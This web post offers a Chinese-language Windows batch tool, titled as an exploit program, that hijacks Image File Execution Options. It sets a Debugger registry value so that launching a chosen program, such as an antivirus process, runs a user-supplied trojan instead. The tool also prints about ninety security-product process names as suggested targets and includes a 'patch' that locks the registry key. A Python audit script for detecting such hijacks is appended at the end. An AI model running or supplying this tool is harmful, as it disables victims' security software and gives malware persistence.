Windows Image Hijack (IFEO) exploit program, bat version

Introduction

When an NT-based system receives a request to run an executable invoked from the command line, it first checks whether the program is an executable; if it is, it then checks the format, and then checks whether the file exists. If it does not exist, the system reports that it cannot find the file, or that the specified path is incorrect, and so on.

[code]
@shift 1
@Echo Off
color f0
title  Windows映像劫持利用程序-By Mice
:clearauto
cls
Echo.
Echo                     Windows映像劫持利用程序
Echo.
Echo 制作:Mice Http://WwW.Mice33.Cn
Echo.
Echo 映像胁持的基本原理:
Echo NT系统在试图执行一个从命令行调用的可执行文件运行请求时,先会检查运行程序是不是可执行文件,如果是的话,再检查格式的,然后就会检查是否存在。。如果不存在的话,它会提示系统找不到文件或 者是“指定的路径不正确等等。。
Echo.
Echo                [1] 哈哈我来利用咯
Echo                [2] 看看常用杀毒软件进程名称
Echo                [3] 修补漏洞
Echo                [0] 退出
Echo.
Set /p clearslt=        请输入您的选择(1/2/3/0):
If "%clearslt%"=="" Goto clearauto
If "%clearslt%"=="1" Goto clearauto1
If "%clearslt%"=="2" Goto changyong
If "%clearslt%"=="3" Goto budong
If "%clearslt%"=="0" Exit
echo 请选择编号
pause
Goto clearauto

:clearauto1
rem Define the file names
set /p file1=    请输入你要挟持的文件名(如avp.exe,rav,exe)
set /p file2=    请输入你木马的绝对路径(如c:\windows\xx.exe)
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%file1%] >mice.reg
regedit /s mice.reg & del /q mice.reg

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%file1%" /f /v "Debugger" /t reg_sz /d "%file2%"
del /q cy.txt
cls
Echo                添加成功.赶快把文件名改成%file1%来测试下吧.
pause>nul
Goto clearauto

:changyong
rem Common software names
echo 常用杀毒软件 >>cy.txt
echo avp.exe >>cy.txt
echo AgentSvr.exe >>cy.txt
echo CCenter.exe>>cy.txt
echo Rav.exe>>cy.txt
echo RavMonD.exe>>cy.txt
echo RavStub.exe>>cy.txt
echo RavTask.exe>>cy.txt
echo rfwcfg.exe>>cy.txt
echo rfwsrv.exe>>cy.txt
echo RsAgent.exe>>cy.txt
echo Rsaupd.exe>>cy.txt
echo runiep.exe>>cy.txt
echo SmartUp.exe>>cy.txt
echo FileDsty.exe>>cy.txt
echo RegClean.exe>>cy.txt
echo 360tray.exe>>cy.txt
echo 360Safe.exe>>cy.txt
echo 360rpt.exe>>cy.txt
echo kabaload.exe>>cy.txt
echo safelive.exe>>cy.txt
echo Ras.exe>>cy.txt
echo KASMain.exe>>cy.txt
echo KASTask.exe>>cy.txt
echo KAV32.exe>>cy.txt
echo KAVDX.exe>>cy.txt
echo KAVStart.exe>>cy.txt
echo KISLnchr.exe>>cy.txt
echo KMailMon.exe>>cy.txt
echo KMFilter.exe>>cy.txt
echo KPFW32.exe>>cy.txt
echo KPFW32X.exe>>cy.txt
echo KPFWSvc.exe>>cy.txt
echo KWatch9x.exe>>cy.txt
echo KWatch.exe>>cy.txt
echo KWatchX.exe>>cy.txt
echo TrojanDetector.exe>>cy.txt
echo UpLive.EXE.exe>>cy.txt
echo KVSrvXP.exe>>cy.txt
echo KvDetect.exe>>cy.txt
echo KRegEx.exe>>cy.txt
echo kvol.exe>>cy.txt
echo kvolself.exe>>cy.txt
echo kvupload.exe>>cy.txt
echo kvwsc.exe>>cy.txt
echo UIHost.exe>>cy.txt
echo IceSword.exe>>cy.txt
echo iparmo.exe>>cy.txt
echo mmsk.exe>>cy.txt
echo adam.exe>>cy.txt
echo MagicSet.exe>>cy.txt
echo PFWLiveUpdate.exe>>cy.txt
echo SREng.exe>>cy.txt
echo WoptiClean.exe>>cy.txt
echo scan32.exe>>cy.txt
echo shcfg32.exe>>cy.txt
echo mcconsol.exe>>cy.txt
echo HijackThis.exe>>cy.txt
echo mmqczj.exe>>cy.txt
echo Trojanwall.exe>>cy.txt
echo FTCleanerShell.exe>>cy.txt
echo loaddll.exe>>cy.txt
echo rfwProxy.exe>>cy.txt
echo KsLoader.exe>>cy.txt
echo KvfwMcl.exe>>cy.txt
echo autoruns.exe>>cy.txt
echo AppSvc32.exe>>cy.txt
echo ccSvcHst.exe>>cy.txt
echo isPwdSvc.exe>>cy.txt
echo symlcsvc.exe>>cy.txt
echo nod32kui.exe>>cy.txt
echo avgrssvc.exe>>cy.txt
echo RfwMain.exe>>cy.txt
echo KAVPFW.exe>>cy.txt
echo Iparmor.exe>>cy.txt
echo nod32krn.exe>>cy.txt
echo PFW.exe>>cy.txt
echo RavMon.exe>>cy.txt
echo KAVSetup.exe>>cy.txt
echo NAVSetup.exe>>cy.txt
echo SysSafe.exe>>cy.txt
echo QHSET.exe>>cy.txt
echo zxsweep.exe>>cy.txt
echo AvMonitor.exe>>cy.txt
echo UmxCfg.exe>>cy.txt
echo UmxFwHlp.exe>>cy.txt
echo UmxPol.exe>>cy.txt
echo UmxAgent.exe>>cy.txt
echo UmxAttachment.exe>>cy.txt
call cy.txt
Goto clearauto

:budong
setacl.exe "machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /registry /deny administrators /full
setacl.exe "machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /registry /deny system /full
Echo                修补成功.
pause>nul
Goto clearauto
[/code]
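As an added defensive example, not part of the original tool: a Python audit that parses the text printed by `reg query ... /s` over the IFEO key and reports every subkey carrying a Debugger value, rating it high when the target image is one of the security-product process names the batch file itself lists. The sample registry text, the SECURITY_IMAGES subset and the function names are assumptions of this example.

```python
import re

IFEO_ROOT = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT"
             r"\CurrentVersion\Image File Execution Options")

# Image names taken from the batch file's own list of security products above.
SECURITY_IMAGES = {"avp.exe", "ravmond.exe", "360tray.exe", "kav32.exe",
                   "nod32krn.exe", "icesword.exe", "autoruns.exe", "hijackthis.exe"}

def parse_reg_query(text: str) -> dict[str, dict[str, tuple[str, str]]]:
    """Parse `reg query <key> /s` text into {subkey: {name: (type, data)}}."""
    keys: dict[str, dict[str, tuple[str, str]]] = {}
    current = None
    for line in filter(str.strip, text.splitlines()):   # skip blank lines
        if not line[0].isspace():              # unindented line = key path
            current = line.strip()
            keys.setdefault(current, {})
        elif current is not None:              # indented "name  type  data"
            parts = re.split(r"\s{2,}|\t", line.strip(), maxsplit=2)
            if len(parts) == 3:
                keys[current][parts[0]] = (parts[1], parts[2])
    return keys

def find_ifeo_debuggers(text: str) -> list[dict]:
    """Report IFEO subkeys that carry a Debugger value, with a severity."""
    findings = []
    for key, values in parse_reg_query(text).items():
        if (not key.lower().startswith(IFEO_ROOT.lower() + "\\")
                or "Debugger" not in values):
            continue
        image = key.rsplit("\\", 1)[1]
        vtype, target = values["Debugger"]
        # The hijack pattern from the batch file: a "debugger" on an AV process.
        severity = "high" if image.lower() in SECURITY_IMAGES else "review"
        findings.append({"image": image, "debugger": target,
                         "type": vtype, "severity": severity})
    return findings

# Constructed sample in the layout `reg query ... /s` prints (not real output).
SAMPLE = f"""
{IFEO_ROOT}\\avp.exe
    Debugger    REG_SZ    c:\\windows\\xx.exe

{IFEO_ROOT}\\notepad.exe
    UseFilter    REG_DWORD    0x1

{IFEO_ROOT}\\myapp.exe
    Debugger    REG_SZ    C:\\Tools\\windbg.exe
"""
```

On a live host, feed `find_ifeo_debuggers` the output of `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /s`; any Debugger value on a security tool's image name is the exact modification the batch file above makes.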
